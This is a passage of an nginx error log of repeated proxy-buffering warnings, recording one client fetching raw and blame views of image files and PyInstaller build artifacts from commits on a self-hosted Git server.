74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" +2026/02/17 14:36:16 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/27/0000014273 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" +2026/02/17 14:36:22 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/27/0000014274 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:36:31 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/27/0000014275 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:36:34 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/27/0000014276 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" +2026/02/17 14:36:40 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/27/0000014277 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" +2026/02/17 14:36:48 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/27/0000014278 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" +2026/02/17 14:36:55 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/27/0000014279 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" +2026/02/17 14:37:04 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/28/0000014280 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 14:37:17 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/28/0000014281 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" +2026/02/17 14:37:24 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/28/0000014282 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" +2026/02/17 14:37:31 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/28/0000014283 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" +2026/02/17 14:37:34 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/28/0000014284 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:37:40 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/28/0000014285 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" +2026/02/17 14:37:47 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/28/0000014286 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" +2026/02/17 14:37:53 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/28/0000014287 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" +2026/02/17 14:39:34 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/28/0000014288 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +2026/02/17 14:40:09 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/28/0000014289 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +2026/02/17 14:40:16 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/29/0000014290 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +2026/02/17 14:40:34 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/29/0000014291 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +2026/02/17 14:40:39 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/29/0000014292 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +2026/02/17 14:40:44 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/29/0000014293 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +2026/02/17 14:40:49 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/29/0000014294 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +2026/02/17 14:41:26 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/29/0000014295 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +2026/02/17 14:41:53 [warn] 918#918: *54292 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/29/0000014296 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +2026/02/17 14:46:30 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/29/0000014297 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +2026/02/17 14:46:43 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/29/0000014298 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" +2026/02/17 14:46:53 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/29/0000014299 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" +2026/02/17 14:46:59 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/30/0000014300 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" +2026/02/17 14:47:02 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/30/0000014301 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" +2026/02/17 14:47:12 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/30/0000014302 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" +2026/02/17 14:47:18 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/30/0000014303 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" +2026/02/17 14:47:25 [warn] 918#918: *55296 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/30/0000014304 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" +2026/02/17 14:53:15 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/30/0000014305 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +2026/02/17 14:53:21 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/30/0000014306 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +2026/02/17 14:53:27 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/30/0000014307 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +2026/02/17 14:53:49 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/30/0000014308 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +2026/02/17 14:54:02 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/30/0000014309 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +2026/02/17 14:56:11 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/31/0000014310 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +2026/02/17 14:56:24 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/31/0000014311 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +2026/02/17 14:56:48 [warn] 918#918: *56304 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/31/0000014312 while reading upstream, client: 74.7.227.38, server: 